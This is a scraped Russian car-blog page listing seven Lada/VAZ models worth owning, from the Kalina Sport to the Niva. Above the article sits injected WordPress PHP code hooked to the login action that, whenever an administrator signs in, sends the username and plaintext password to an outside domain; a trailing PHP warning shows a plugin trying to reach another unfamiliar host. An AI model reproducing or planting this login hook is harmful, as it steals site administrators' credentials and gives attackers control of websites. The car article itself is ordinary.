if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Lada Vesta и еще 6 вазовских тачек, за которые не стыдно — DigiLider

Lada Vesta и еще 6 вазовских тачек, за которые не стыдно

Lada Vesta и еще 6 вазовских тачек, за которые не стыдно

Lada Vesta и еще 6 вазовских тачек, за которые не стыдно

Lada Kalina Sport
Возможно, в других обстоятельствах мы бы отнеслись к “Калине” иначе. Но если учесть, кто именно побывал в роли тестировщика ярко-желтого хэтчбека со спортивным обвесом…
1

2101
Кстати, самый первый серийный автомобиль, покинувший цеха Тольяттинского автозавода, тоже был козырной тачкой. “Копейкой” ВАЗ-2101 прозвали потом, много позже: первое же время российский вариант FIAT-124 пользовался благоговейным уважением трудящихся. Маленький седанчик резво бежал, мало шумел и без проблем заводился даже в лютый мороз. Кстати, ВАЗ-2101 весьма бойко шел на экспорт.
2

ВАЗ-2108
Первая отечественная модель с перед ним приводом (ну давайте только не будем записывать в племя переднеприводных военные ЛуАЗики) – это еще одна удача ВАЗа. Хотя без участия иностранных мозгов тоже не обошлось: доподлинно известно, что в доработке “зубила” весьма активное участие принимали инженеры Porsche. Кстати, в запасниках фирменного музея марки в Штутгарте даже хранится одна “восьмерка”. Возможно, именно отсюда растут ноги острой управляемости и весьма недурственной динамики “восьмерки”. Кстати, уже в начале 90-х гоночные “зубила”, подготовленные для участия в ралли-рейдах, оснащались моторами… Porsche. История любит повторяться.
3

Largus
Конечно, в данном случае имеет место банальный случай бэдж-инжиниринга. Разумеется, мы в TG считаем, что перевешивать эмблемы с одной машины на другую и выдавать ее за новую – это не очень хорошо. Но, с другой стороны, не так уж часто Тольятти радовал нас автомобилями, за которые не страшно отдавать свои деньги. А за большой и добротный “Логан”-универсал с ладьей на решетке радиатора – не жалко.
4

2103
Когда-то это была мечта. В Советском Союзе даже “копейку” купить было делом более чем непростым, а уж сторговать себе более мощную и модную “трешку”… Э-э-э, брат, проще было угадать 6 из 49 или 5 из 36. Зато сравнительно небольшой тираж превратил “трешку” в настоящую классику. Сегодня ВАЗ-2103 в хорошем состоянии ценится на уровне гораздо более пожилой и жирной 21-й “Волги”.
5

Vesta
Как реанимировать автомобильный бренд, реанимировать который как будто невозможно? Легко – нужно просто найти правильных реаниматоров. Нынешний глава “АвтоВАЗа” швед Бу Андерссон и главный дизайнер марки Стив Маттин из Англии в режиме реального времени творят невозможное и возвращают гордость за автомобили с клеймом “Сделано в России”. Новая “Веста” только в начале пути, но уже ясно – провала не будет!
6

ВАЗ-2121
Без “Нивы” этот список был бы неполным. Как можно обойти вниманием самый популярный за рубежом советский автомобиль? Истинная легенда своей эпохи, “Нива” всегда была крутой и остается такой до сих пор.
7


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)